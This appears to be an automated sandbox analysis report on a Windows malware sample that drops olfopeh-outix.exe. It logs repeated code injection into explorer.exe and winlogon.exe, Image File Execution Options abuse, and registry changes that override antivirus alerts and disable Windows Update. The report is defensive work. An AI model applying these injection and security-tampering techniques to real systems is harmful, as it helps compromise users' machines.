Code function: 0_2_004033EB EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetModuleFileNameA,GetCommandLineA,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,LoadLibraryA,LoadLibraryA,CreateFileA,lstrcmpi,wsprintfA,CreateMutexA,GetLastError,FindCloseChangeNotification,ExpandEnvironmentStringsA,CreateFileA,CreateThread,CloseHandle,GetComputerNameA,lstrcpy,wsprintfA,lstrcpy,lstrcat,RegCreateKeyA,lstrcpy,lstrcpy,ExpandEnvironmentStringsA,

0_2_004033EB

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_004033EB mov eax, dword ptr fs:[00000030h]	0_2_004033EB
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_004091DE mov ebx, dword ptr fs:[00000030h]	0_2_004091DE
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_004033EB mov eax, dword ptr fs:[00000030h]	1_2_004033EB
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_004091DE mov ebx, dword ptr fs:[00000030h]	1_2_004091DE

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\System32\winlogon.exe base: 38B90000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4600000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 27E0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2890000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4610000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4620000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4630000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4650000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 47C0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 47D0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2A80000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4A60000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 49C0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2800000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4A70000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2820000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2880000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2AE0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 49F0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4A30000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4A90000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4AA0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4A80000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4AC0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4AE0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4B00000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4AD0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C00000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4640000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4B20000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4BE0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C40000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C10000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C50000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4B10000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C60000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C70000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C80000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4C90000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2810000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4CA0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4E70000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4EA0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4E90000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4EB0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4F70000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4E80000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4F80000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4F90000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4FB0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 890000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2AB0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4EC0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4FA0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 2870000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4EE0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4FE0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 5500000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4FC0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 4FD0000	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: C:\Windows\explorer.exe base: 5510000	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 38B90000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4600000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 27E0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2890000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4610000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4620000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4630000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4650000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 47C0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 47D0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2A80000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4A60000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 49C0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2800000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4A70000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2820000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2880000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2AE0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 49F0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4A30000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4A90000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4AA0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4A80000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4AC0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4AE0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4AF0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4B00000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4AD0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C00000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4640000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4B20000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4BE0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C40000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C10000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C50000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4B10000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C60000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C70000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C80000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4C90000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2810000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4CA0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4E70000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4EA0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4E90000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4EB0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4F70000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4E80000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4F80000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4F90000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4FB0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 890000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2AB0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4EC0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4FA0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 2870000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4EE0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4FE0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 5500000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4FC0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 4FD0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory allocated: C:\Windows\explorer.exe base: 5510000 protect: page read and write	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4600000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 27E0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2890000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4610000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4620000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4630000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4650000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 47C0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 47D0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2A80000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4A60000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 49C0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2800000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4A70000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2820000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2880000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2AE0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 49F0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4A30000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4A90000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4AA0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4A80000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4AC0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4AE0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4AF0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4B00000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4AD0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C00000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4640000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4B20000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4BE0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C40000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C10000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C50000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4B10000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C60000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C70000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C80000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4C90000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2810000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4CA0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4E70000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4EA0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4E90000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4EB0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4F70000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4E80000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4F80000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4F90000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4FB0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 890000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2AB0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4EC0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4FA0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 2870000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4EE0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4FE0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 5500000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4FC0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 4FD0000 value: 43	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Memory written: PID: 3528 base: 5510000 value: 43	Jump to behavior

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,Process32Next,CloseHandle,WaitForSingleObject,CloseHandle,GetStartupInfoA,OpenProcess,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe		1_2_00403478
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpi,lstrcmpi,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,CloseHandle,FindCloseChangeNotification,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe		1_2_00403FF5

Source: winlogon.exe, 00000003.00000002.581830352.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.315790800.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.362388554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
Source: winlogon.exe, 00000003.00000002.581830352.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.315790800.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.399756846.0000000005C70000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000003.00000002.581830352.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.315790800.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.362388554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.317150233.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.385399111.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.361858317.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: winlogon.exe, 00000003.00000002.581830352.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.315790800.00000188796A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.362388554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

0_2_0040265F

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

0_2_004033EB

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride

Jump to behavior

Modifies windows update settings

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU NoAutoUpdate

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
